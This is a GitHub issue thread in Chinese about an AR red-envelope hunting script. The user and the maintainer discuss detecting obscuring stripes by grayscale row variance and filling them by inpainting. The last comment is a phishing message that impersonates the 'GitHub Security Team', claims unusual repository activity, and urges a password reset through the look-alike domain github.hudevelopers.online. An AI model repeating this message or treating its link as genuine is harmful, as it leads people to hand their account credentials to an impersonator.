### ISSUE TITLE
更新了

### ISSUE THREAD

**Issue by konanzheng** [abuccts/ar-lucky-money-hunt#2]
条纹加了阴影，阴影高度也不确定了，条纹颜色也变化了，怎么准确判断出条纹所在然后根据条纹上下附近的颜色来填充啊，填充的更加平滑，下面这个图片中的线条明显是断开的能处理程连续的吗？
原图：
![261927024](https://cloud.githubusercontent.com/assets/3112689/21491198/0557b1fc-cc36-11e6-9e6f-0f54c7722e5b.jpg)
脚本处理后：
![261927024](https://cloud.githubusercontent.com/assets/3112689/21491185/edb7bf56-cc35-11e6-9632-b3df36fad153.jpg)

**Comment by abuccts** [comment]
1. 条纹是根据灰度图中每一行灰度值的方差确定的，小于阈值的行判为条纹，与条纹高度、颜色无关。修补的算法参考 [wikipedia](https://en.wikipedia.org/wiki/Inpainting).
2. 这样修补的方法对人脸、颜色多样、光线好的图片作用比较明显，颜色单一或光线暗的图片成功率很低。

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
